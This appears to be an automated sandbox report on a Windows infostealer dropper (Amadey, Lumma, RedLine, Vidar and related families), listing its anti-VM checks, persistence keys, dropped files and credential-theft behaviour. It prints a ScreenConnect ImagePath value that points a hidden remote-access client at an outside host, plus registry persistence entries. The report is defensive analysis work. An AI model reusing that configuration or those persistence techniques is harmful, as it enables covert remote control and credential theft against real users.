Malware Analysis Report

2025-04-03 09:37

Sample ID 250227-e6el4awqx3
Target daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
SHA256 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30
Tags
amadey lumma redline stealc systembc vidar 092155 a4d2cd ir7am reno testproliv credential_access defense_evasion discovery execution infostealer persistence privilege_escalation spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30

Threat Level: Known bad

The file daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe was found to be: Known bad.

Malicious Activity Summary

Detect Vidar Stealer

Systembc family

RedLine

Lumma Stealer, LummaC

Amadey family

Amadey

Lumma family

Stealc family

RedLine payload

Stealc

Vidar family

Redline family

SystemBC

Vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Sets service image path in registry

Reads user/profile data of local email clients

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of web browsers

Identifies Wine through registry keys

Unsecured Credentials: Credentials In Files

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Reads data files stored by FTP clients

Enumerates connected drives

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Boot or Logon Autostart Execution: Authentication Package

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-27 04:32

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-27 04:32

Reported

2025-02-27 04:35

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

RedLine

infostealer redline

RedLine payload

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

execution

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=c702df34-cc7f-4684-be57-00a2effa70db&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA%2buhuC0yR4EGoESmZ0s79XgAAAAACAAAAAAAQZgAAAAEAACAAAADdHjIJNBzn2DFJSB7eMvjIMhedK38hrzy7czFAxhNBggAAAAAOgAAAAAIAACAAAACKJC%2bduF0xytf8Ja5EYeeE3jr1NZtEp45ur39uVUAHcKAEAADp5rRi194QugjV5bM0Dbimv5OAD4HVNg1kIZsA9wLnHjeF0TARqYa0FBXlQoT2MNX1bQET8RtzKXTf3rfDYIyfu%2bM3jJZtYizoW3zUNlKQ8auNK3ucje449H%2brzb%2bessUXh7TKtmauj1FP%2flz5J27v0v7CfnR3WZvfoVd7V%2fQgp5uLQ84Ju3CmmgeCGSz%2bNS915Q0CKjVVTPm53MhBHZ%2fA01Ik9RIDwFM0SwCdqspY4WN5%2f0ykSpUPVFFSFH0TPuMAYaFuIcinIXJLwme3gGPe7nusogwO%2f8PR1n1DHxzd0%2bkePq%2fWvHrO%2fZ643BWh1SvXOr6Mj5M9kdW0HOa1iYOqYThcgZKLxRltlMr2F86061UDirbS4jodjb5oSE%2biQHTQ9Sv3z5q22gimrURp7WBka6Dj2BGx8HF97kG78XsHv8GUH0CwP6629pji9KezkK21ZrPZKHFOWSSsH0q%2b%2bVZvKMBp%2fy5rgtNPP0EdJxOdFNZCijqXBDiBSQXd3SvjzPca%2bQgGaqjHHA98Dc12OgPf7xfd0%2fn8p2hGvLBG9srjnRLcawtNDFOobSS69edpERMQ70I9oD085Fe5udpeR37Uveb3uHeDEwLHbrTtvDq5F9dNx8hXFb9R9IV7uxgMg5JH7RU8k7YTfZw1yZMPP34hEeIsayeSYOEPzCtHgesLADmkbRE4qlOmiZsRqhZI0zWyYaJDj0v%2b99n9JPBjIJqU2SaqbvvqK76gGIfvfFRRJyeF4%2bn6VR5TfQ8g13V4psVhFGJ5rBymTQpmCxLv3MO9cu1mLtRaDs3hL9YB5kUD5AhIzRPBs4FdylzEkyM%2f3w%2fYgmJsNeHCGozvFeOqXahWkHve5eqhWK52VzZAV3P%2f55FX%2bR811eHd9H%2fIU%2fq6Bb3C8OJpcpnMiAdwKVJAk719XtTEAwpC%2b3dPaddkJqR%2fcb8SYHiH4gRuXcYve8mvMtUj4NllsUTNKy44Qf15QIJDt5HXTondtkudoT1P32ICcyR%2bAXiCu36%2f1JhRQWnDfyT0bmxlXaJl%2bQt%
2bxx80%2bakvOMuznud9yNyVxF6tXIuRrwbl7Dm9NmnSJK5fqzhxuocPgGtButsyGnHRM1PUjfyJtJH4005OBVpY40kHMDOFGOUJgPMQ5otX%2fgY25qj1VmRZv4Q7UAXh%2bFoApH%2bzWnGIYy%2bC3IW14SGHNloG9GLb6TTZWkGetv86wQCY6Trstg5BKb4dy7m2kAyWvKLBuxZHZJxvgBX4dpjNFEUGPX5evUqvnx%2fwzhITuRwiK45qs1x5n3PMGZZ4YiUwP%2bEy81lH1yyFn%2fuc2PAbMrf2LTNP6EbigE2VKbVDZcGMPvRyz2BVF3bMT5d1zQeP8MMrkcJosP2aa240KW9rFMHH0%2b%2bSSEgoJKxyRqMorLDN9Nqt189teNY9b5luRDwDjNnkjMatn5LfWNHxCJcAbYBtGVhFswtzHfvOxuKyi%2bG0x%2bIUHTwcNoAyaeNVnmUknekw%2ftBWkp7cTkUtnlKAzE9aExO%2f9pYEMAHZvLoCgaT%2flPaXRFuW3LQ6n3al0yPMYrKIfX8Hb5xlyLIXNjOOCWg7CGo3wEAAAADq6%2bUmLXU3OAHucKKOo7%2bCcIpeWRkMJaYfchWX%2bACEsS%2f3KVnTfmhEhJ%2bc4E8seRRX2CE0HhivKlACVwapUjmW&c=test&c=&c=&c=&c=&c=&c=&c=\"" N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038770121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7cdb9b9956.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038760101\\7cdb9b9956.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\qhwphed4.tmp N/A N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\qhwphed4.newcfg N/A N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e58a073.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA1CA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA1AA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Test Task17.job N/A N/A
File created C:\Windows\Installer\e58a071.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58a071.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA2D5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
